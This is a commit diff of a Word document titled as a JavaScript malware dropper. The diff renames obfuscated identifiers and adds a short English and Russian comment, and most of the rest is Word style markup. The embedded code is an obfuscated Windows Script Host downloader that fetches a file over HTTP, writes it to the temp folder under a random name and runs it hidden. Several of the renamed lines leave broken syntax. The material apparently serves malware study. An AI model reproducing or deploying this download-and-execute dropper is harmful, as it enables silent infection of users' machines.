<commit_message>
Rename some obfuscated variables and 1st chapter of Readme.md
</commit_message>
<xml_diff>
--- a/Malware_JavaScript_Dropper.docx
+++ b/Malware_JavaScript_Dropper.docx
@@ -14,7 +14,7 @@
         <w:rPr>
           <w:rtl w:val="0"/>
         </w:rPr>
-        <w:t xml:space="preserve">var _0x22fa1f = _0x2ad0;</w:t>
+        <w:t xml:space="preserve">var _0x22fa1f = _initial_launchFunc;</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -47,7 +47,7 @@
           <w:rtl w:val="0"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">var _0x364b15 = _0x2ad0,</w:t>
+        <w:t xml:space="preserve">var _0x364b15 = _initial_launchFunc,</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -118,13 +118,13 @@
         </w:rPr>
         <w:t xml:space="preserve">        </w:t>
         <w:tab/>
-        <w:t xml:space="preserve">var _0x3db72c = parseInt(_0x364b15(0x1ef)) / 0x1 * (parseInt(_0x364b15(0x1e5)) / 0x2) + parseInt(_0x364b15(0x1f3)) / 0x3 * (parseInt(_0x364b15(0x1f9)) / 0x4) + -parseInt(_0x364b15(0x1f0)) / 0x5 * (parseInt(_0x364b15(0x1f4)) / 0x6) </w:t>
+        <w:t xml:space="preserve">var _0x3db72c = parseInt(_0x364b15(495)) / 1 * (parseInt(_0x364b15(485)) / 0x2) + parseInt(_0x364b15(499)) / 3 * (parseInt(_0x364b15(505)) / 4) + -parseInt(_0x364b15(496)) / 5 * (parseInt(_0x364b15(500)) / 6) </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rtl w:val="0"/>
         </w:rPr>
-        <w:t xml:space="preserve">+ parseInt(_0x364b15(0x1f6)) / 0x7 * (-parseInt(_0x364b15(0x1e9)) / 0x8) + -parseInt(_0x364b15(0x1f7)) / 0x9 * (-parseInt(_0x364b15(0x1ed)) / 0xa) + -parseInt(_0x364b15(0x203)) / 0xb + -parseInt(_0x364b15(0x1e8)) / 0xc * (parseInt(_0x364b15(0x200)) / 0xd);</w:t>
+        <w:t xml:space="preserve">+ parseInt(_0x364b15(502)) / 7 * (-parseInt(_0x364b15(489)) / 8) + -parseInt(_0x364b15(503)) / 9 * (-parseInt(_0x364b15(493)) / 10) + -parseInt(_0x364b15(515)) / 11 + -parseInt(_0x364b15(488)) / 12 * (parseInt(_0x364b15(512)) / 13);</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -247,7 +247,7 @@
         <w:rPr>
           <w:rtl w:val="0"/>
         </w:rPr>
-        <w:t xml:space="preserve">}(_0x131b, 0x7bbe1));</w:t>
+        <w:t xml:space="preserve">}(_StoreMaliciousCommands, 0x7bbe1));</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -278,7 +278,7 @@
         <w:rPr>
           <w:rtl w:val="0"/>
         </w:rPr>
-        <w:t xml:space="preserve">function _0x131b() {</w:t>
+        <w:t xml:space="preserve">function _StoreMaliciousCommands() {</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -288,7 +288,9 @@
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -303,7 +305,150 @@
         </w:rPr>
         <w:t xml:space="preserve">osition', 'CreateObject', '811974EpasyL', '12YWhdLu', 'ExpandEnvironmentStrings', '161niwgeO', '9momQLi', 'send', '4jtkQWe', 'WScript.Shell', 'substring', 'Close', 'random', 'Write', 'ResponseBody', '70239FHGPwr', 'status', 'Type', '6616236zGcHfF', 'Run'];</w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="false"/>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">return </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">_0x44cf17;</w:t>
+      </w:r>
       <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="false"/>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/* </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="false"/>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">False Invoke </w:t>
+      </w:r>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="false"/>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ложный вызов </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">поддельная вложенность</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">)</w:t>
+      </w:r>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="false"/>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">*/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -318,7 +463,7 @@
           <w:rtl w:val="0"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">_0x131b = function() {</w:t>
+        <w:t xml:space="preserve">_StoreMaliciousCommands = function() {</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -370,7 +515,7 @@
           <w:rtl w:val="0"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">return _0x131b();</w:t>
+        <w:t xml:space="preserve">return _StoreMaliciousCommands();</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -417,7 +562,7 @@
         <w:rPr>
           <w:rtl w:val="0"/>
         </w:rPr>
-        <w:t xml:space="preserve">function _0x2ad0(_0x2cd2a4, _0x105e15) {</w:t>
+        <w:t xml:space="preserve">function _initial_launchFunc(_0x2cd2a4, _0x105e15) {</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -434,7 +579,7 @@
           <w:rtl w:val="0"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">var _0x131be9 = _0x131b();</w:t>
+        <w:t xml:space="preserve">var _StoreMaliciousCommandse9 = _StoreMaliciousCommands();</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -451,7 +596,7 @@
           <w:rtl w:val="0"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">return _0x2ad0 = function(_0x2ad0ec, _0x3f4979) {</w:t>
+        <w:t xml:space="preserve">return _initial_launchFunc = function(_initial_launchFunc***ec, _0x3f4979) {</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -469,7 +614,7 @@
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
         <w:tab/>
-        <w:t xml:space="preserve">_0x2ad0ec = _0x2ad0ec - 0x1e5;</w:t>
+        <w:t xml:space="preserve">_initial_launchFuncec = _initial_launchFunc***ec - 485;</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -487,7 +632,7 @@
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
         <w:tab/>
-        <w:t xml:space="preserve">var _0x5d8691 = _0x131be9[_0x2ad0ec];</w:t>
+        <w:t xml:space="preserve">var _0x5d8691 = _StoreMaliciousCommandse9[_initial_launchFunc***ec];</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -522,7 +667,7 @@
           <w:rtl w:val="0"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">}, _0x2ad0(_0x2cd2a4, _0x105e15);</w:t>
+        <w:t xml:space="preserve">}, _initial_launchFunc(_0x2cd2a4, _0x105e15);</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -571,7 +716,19 @@
           <w:rtl w:val="0"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">var shell = WScript['CreateObject'](_0x22fa1f(0x1fa)),</w:t>
+        <w:t xml:space="preserve">var shell = WScript['CreateObject'](_0x22fa1f(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">506</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">)),</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -589,7 +746,19 @@
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
         <w:tab/>
-        <w:t xml:space="preserve">fso = WScript[_0x22fa1f(0x1f2)](_0x22fa1f(0x1eb)),</w:t>
+        <w:t xml:space="preserve">fso = WScript[_0x22fa1f(498)](_0x22fa1f(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">491</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">)),</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -607,7 +776,7 @@
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
         <w:tab/>
-        <w:t xml:space="preserve">tempFolder = shell[_0x22fa1f(0x1f5)](_0x22fa1f(0x1e6)),</w:t>
+        <w:t xml:space="preserve">tempFolder = shell[_0x22fa1f(501)](_0x22fa1f(486)),</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -625,7 +794,7 @@
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
         <w:tab/>
-        <w:t xml:space="preserve">randomName = Math[_0x22fa1f(0x1fd)]()['toString'](0x24)[_0x22fa1f(0x1fb)](0x2, 0xa) + _0x22fa1f(0x1e7),</w:t>
+        <w:t xml:space="preserve">randomName = Math[_0x22fa1f(509)]()['toString'](36)[_0x22fa1f(507)](2, 10) + _0x22fa1f(487),</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -685,7 +854,7 @@
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
         <w:tab/>
-        <w:t xml:space="preserve">xhr = WScript[_0x22fa1f(0x1f2)](_0x22fa1f(0x1ea));</w:t>
+        <w:t xml:space="preserve">xhr = WScript[_0x22fa1f(498)](_0x22fa1f(490));</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -702,7 +871,7 @@
           <w:rtl w:val="0"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">xhr[_0x22fa1f(0x1ec)]('GET', fileUrl, ![]), xhr[_0x22fa1f(0x1f8)]();</w:t>
+        <w:t xml:space="preserve">xhr[_0x22fa1f(492)]('GET', fileUrl, ![]), xhr[_0x22fa1f(504)]();</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -719,7 +888,7 @@
           <w:rtl w:val="0"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">if (xhr[_0x22fa1f(0x201)] === 0xc8) {</w:t>
+        <w:t xml:space="preserve">if (xhr[_0x22fa1f(513)] === 200) {</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -737,7 +906,7 @@
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
         <w:tab/>
-        <w:t xml:space="preserve">var stream = WScript[_0x22fa1f(0x1f2)]('ADODB.Stream');</w:t>
+        <w:t xml:space="preserve">var stream = WScript[_0x22fa1f(498)]('ADODB.Stream');</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -761,7 +930,7 @@
         <w:rPr>
           <w:rtl w:val="0"/>
         </w:rPr>
-        <w:t xml:space="preserve">fa1f(0x1ee)](), stream[_0x22fa1f(0x202)] = 0x1, stream[_0x22fa1f(0x1fe)](xhr[_0x22fa1f(0x1ff)]), stream[_0x22fa1f(0x1f1)] = 0x0, stream['SaveToFile'](filePath, 0x2), stream[_0x22fa1f(0x1fc)](), shell[_0x22fa1f(0x204)]('\x22' + filePath + '\x22', 0x0, ![]);</w:t>
+        <w:t xml:space="preserve">fa1f(494)](), stream[_0x22fa1f(514)] = 0x1, stream[_0x22fa1f(510)](xhr[_0x22fa1f(511)]), stream[_0x22fa1f(497)] = 0x0, stream['SaveToFile'](filePath, 2), stream[_0x22fa1f(508)](), shell[_0x22fa1f(516)]('”' + filePath + '”', 0, ![]);</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -810,6 +979,7 @@
       <w:r/>
     </w:p>
     <w:sectPr>
+      <w:headerReference w:type="default" r:id="rId8"/>
       <w:footnotePr/>
       <w:endnotePr/>
       <w:type w:val="nextPage"/>
@@ -832,7 +1002,6 @@
         <w:ind/>
         <w:rPr/>
       </w:pPr>
-      <w:r/>
       <w:r>
         <w:separator/>
       </w:r>
@@ -847,7 +1016,6 @@
         <w:ind/>
         <w:rPr/>
       </w:pPr>
-      <w:r/>
       <w:r>
         <w:continuationSeparator/>
       </w:r>
@@ -867,7 +1035,6 @@
         <w:ind/>
         <w:rPr/>
       </w:pPr>
-      <w:r/>
       <w:r>
         <w:separator/>
       </w:r>
@@ -882,7 +1049,6 @@
         <w:ind/>
         <w:rPr/>
       </w:pPr>
-      <w:r/>
       <w:r>
         <w:continuationSeparator/>
       </w:r>
@@ -890,6 +1056,22 @@
     </w:p>
   </w:footnote>
 </w:footnotes>
+</file>
+
+<file path=word/header1.xml><?xml version="1.0" encoding="utf-8"?>
+<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14">
+  <w:p>
+    <w:pPr>
+      <w:pStyle w:val="869"/>
+      <w:pBdr/>
+      <w:spacing/>
+      <w:ind/>
+      <w:rPr/>
+    </w:pPr>
+    <w:r/>
+    <w:r/>
+  </w:p>
+</w:hdr>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
@@ -1049,7 +1231,7 @@
     <w:lsdException w:name="Bibliography" w:uiPriority="37"/>
     <w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/>
   </w:latentStyles>
-  <w:style w:type="table" w:styleId="10" w:default="1">
+  <w:style w:type="table" w:styleId="713" w:default="1">
     <w:name w:val="Normal Table"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
@@ -1242,9 +1424,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="11">
+  <w:style w:type="table" w:styleId="714">
     <w:name w:val="Table Grid"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="59"/>
     <w:pPr>
       <w:pBdr/>
@@ -1441,9 +1623,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="12">
+  <w:style w:type="table" w:styleId="715">
     <w:name w:val="Table Grid Light"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="59"/>
     <w:pPr>
       <w:pBdr/>
@@ -1640,9 +1822,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="13">
+  <w:style w:type="table" w:styleId="716">
     <w:name w:val="Plain Table 1"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="59"/>
     <w:pPr>
       <w:pBdr/>
@@ -1865,9 +2047,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="14">
+  <w:style w:type="table" w:styleId="717">
     <w:name w:val="Plain Table 2"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="59"/>
     <w:pPr>
       <w:pBdr/>
@@ -2098,9 +2280,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="15">
+  <w:style w:type="table" w:styleId="718">
     <w:name w:val="Plain Table 3"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -2328,9 +2510,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="16">
+  <w:style w:type="table" w:styleId="719">
     <w:name w:val="Plain Table 4"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -2544,9 +2726,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="17">
+  <w:style w:type="table" w:styleId="720">
     <w:name w:val="Plain Table 5"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -2777,9 +2959,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="18">
+  <w:style w:type="table" w:styleId="721">
     <w:name w:val="Grid Table 1 Light"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -3000,9 +3182,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="19">
+  <w:style w:type="table" w:styleId="722">
     <w:name w:val="Grid Table 1 Light - Accent 1"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -3223,9 +3405,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="20">
+  <w:style w:type="table" w:styleId="723">
     <w:name w:val="Grid Table 1 Light - Accent 2"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -3446,9 +3628,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="21">
+  <w:style w:type="table" w:styleId="724">
     <w:name w:val="Grid Table 1 Light - Accent 3"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -3669,9 +3851,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="22">
+  <w:style w:type="table" w:styleId="725">
     <w:name w:val="Grid Table 1 Light - Accent 4"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -3892,9 +4074,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="23">
+  <w:style w:type="table" w:styleId="726">
     <w:name w:val="Grid Table 1 Light - Accent 5"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -4115,9 +4297,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="24">
+  <w:style w:type="table" w:styleId="727">
     <w:name w:val="Grid Table 1 Light - Accent 6"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -4338,9 +4520,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="25">
+  <w:style w:type="table" w:styleId="728">
     <w:name w:val="Grid Table 2"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -4570,9 +4752,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="26">
+  <w:style w:type="table" w:styleId="729">
     <w:name w:val="Grid Table 2 - Accent 1"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -4802,9 +4984,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="27">
+  <w:style w:type="table" w:styleId="730">
     <w:name w:val="Grid Table 2 - Accent 2"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -5034,9 +5216,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="28">
+  <w:style w:type="table" w:styleId="731">
     <w:name w:val="Grid Table 2 - Accent 3"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -5266,9 +5448,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="29">
+  <w:style w:type="table" w:styleId="732">
     <w:name w:val="Grid Table 2 - Accent 4"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -5498,9 +5680,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="30">
+  <w:style w:type="table" w:styleId="733">
     <w:name w:val="Grid Table 2 - Accent 5"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -5730,9 +5912,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="31">
+  <w:style w:type="table" w:styleId="734">
     <w:name w:val="Grid Table 2 - Accent 6"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -5962,9 +6144,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="32">
+  <w:style w:type="table" w:styleId="735">
     <w:name w:val="Grid Table 3"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -6063,29 +6245,6 @@
         <w:tblBorders/>
       </w:tblPr>
       <w:tcPr>
-        <w:shd w:color="ffffff"/>
-        <w:tcBorders>
-          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
-          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
-          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
-          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
-        </w:tcBorders>
-      </w:tcPr>
-    </w:tblStylePr>
-    <w:tblStylePr w:type="firstRow">
-      <w:rPr>
-        <w:b/>
-        <w:color w:val="404040"/>
-      </w:rPr>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-      </w:pPr>
-      <w:tblPr>
-        <w:tblBorders/>
-      </w:tblPr>
-      <w:tcPr>
         <w:shd w:val="clear" w:color="ffffff"/>
         <w:tcBorders>
           <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
@@ -6095,30 +6254,7 @@
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
-    <w:tblStylePr w:type="lastCol">
-      <w:rPr>
-        <w:i/>
-        <w:color w:val="404040"/>
-      </w:rPr>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-      </w:pPr>
-      <w:tblPr>
-        <w:tblBorders/>
-      </w:tblPr>
-      <w:tcPr>
-        <w:shd w:color="ffffff"/>
-        <w:tcBorders>
-          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
-          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
-          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
-          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
-        </w:tcBorders>
-      </w:tcPr>
-    </w:tblStylePr>
-    <w:tblStylePr w:type="lastRow">
+    <w:tblStylePr w:type="firstRow">
       <w:rPr>
         <w:b/>
         <w:color w:val="404040"/>
@@ -6141,6 +6277,52 @@
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
+    <w:tblStylePr w:type="lastCol">
+      <w:rPr>
+        <w:i/>
+        <w:color w:val="404040"/>
+      </w:rPr>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+      </w:pPr>
+      <w:tblPr>
+        <w:tblBorders/>
+      </w:tblPr>
+      <w:tcPr>
+        <w:shd w:val="clear" w:color="ffffff"/>
+        <w:tcBorders>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+        </w:tcBorders>
+      </w:tcPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="lastRow">
+      <w:rPr>
+        <w:b/>
+        <w:color w:val="404040"/>
+      </w:rPr>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+      </w:pPr>
+      <w:tblPr>
+        <w:tblBorders/>
+      </w:tblPr>
+      <w:tcPr>
+        <w:shd w:val="clear" w:color="ffffff"/>
+        <w:tcBorders>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+        </w:tcBorders>
+      </w:tcPr>
+    </w:tblStylePr>
     <w:tblStylePr w:type="nwCell">
       <w:pPr>
         <w:pBdr/>
@@ -6207,9 +6389,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="33">
+  <w:style w:type="table" w:styleId="736">
     <w:name w:val="Grid Table 3 - Accent 1"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -6308,29 +6490,6 @@
         <w:tblBorders/>
       </w:tblPr>
       <w:tcPr>
-        <w:shd w:color="ffffff"/>
-        <w:tcBorders>
-          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
